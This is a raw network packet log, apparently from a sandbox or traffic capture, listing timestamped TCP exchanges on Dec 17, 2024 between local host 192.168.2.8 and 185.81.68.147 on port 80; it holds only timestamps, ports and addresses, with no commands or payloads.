                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.931215048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.931332111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.932076931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.932089090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.932332039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.933015108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.933341026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.933430910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934283972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934298038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934429884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934921026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934932947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.935014963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.935905933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.936000109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.936083078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.936813116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.937382936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.937464952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.937764883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.937902927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.938170910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.938709974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.938858032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.938949108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.939672947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.939717054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.939802885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.940545082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.940697908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.940788031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.941575050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.941730976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.941819906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.942467928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.942576885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.942691088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.943485022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.943568945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.943651915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.944420099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.944571972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.944672108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.945310116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.945446014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.945570946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.946281910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.946449995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.946554899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.947204113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.947319984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.947398901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.948285103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.948434114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.948518991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.949132919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.949281931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.949366093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.950177908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.950200081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.950325966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.951011896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.951076031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.951211929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.952096939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.952299118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.952439070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.953634024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.953648090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.953752041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.953984976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.954158068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.954246044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.954782963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.954988003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.955244064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.955713987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.999356031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.098016977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.098032951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.098165035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.098434925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.098818064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.099014044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.099256039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.099885941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.099898100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.099993944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.100756884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.100769997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.100914955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.101501942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.101579905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.101619959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.102505922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.102576971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.102694988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.103483915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.103563070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.103595972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.104362965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.104408026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.104479074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.105355978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.105407000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.105452061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.106415987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.106426954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.106534958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.107239962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.107331038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.107366085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.108212948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.108321905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.108370066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.109143019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.109237909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.109273911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.110059977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.110131025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.110222101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.111041069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.111139059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.111238003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.112020969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.112104893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.112140894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.113122940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.113176107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.113213062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.113899946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.113979101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.114025116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.114831924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.114845037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.114943027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.115813971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.115905046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.116013050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.116830111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.116872072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.116986990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.117755890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.117821932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.117855072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.118709087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.118767023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.118784904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.119658947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.119678974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.119719982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.120549917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.120603085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.120635033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.121504068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.121611118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.121645927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.122576952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.122589111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.122641087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.123457909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.123503923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.123528004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.124349117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.124418974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.124495029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.125498056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.125598907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.125684023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.126512051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.126629114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.126652002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.127365112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.127377033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.127466917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.128303051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.128317118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.128371000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.129116058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.129276037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.129328966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.130094051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.130191088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.130383968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.131108999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.131123066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.131254911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.132658005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.132669926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.132775068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.133126020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.133138895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.133272886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.133892059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.133954048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.134114027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.134870052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.134955883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.134984970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.135772943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.135819912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.135864973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.136797905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.136852980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.137012959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.137705088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.137800932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.137835026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.138652086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.138850927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.138890982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.139585972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.139664888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.139710903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.140678883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.140692949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.140810966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.141733885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.141746044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.141880989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.142637968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.142649889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.142733097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.143564939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.143672943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.143799067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.144383907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.144598961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.144620895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.145442009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.145453930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.145653009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.146308899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.146393061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.146421909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.147214890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.147258043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.147284031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.191618919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.290735960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.290826082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.290958881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.291357994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.291501045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.291594028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.291883945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.292042017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.292290926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.292962074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.293070078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.293220043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.294166088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.294246912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.294349909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295202971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295305014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295404911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295733929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295804024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295943022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.296526909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.296760082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.296916962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.297328949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.297429085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.297653913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298094988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298144102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298228979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298892021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298909903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.299027920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.299875021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.299953938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.300024986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.300776005 CET8049709185.81.68.147192.168.2.8
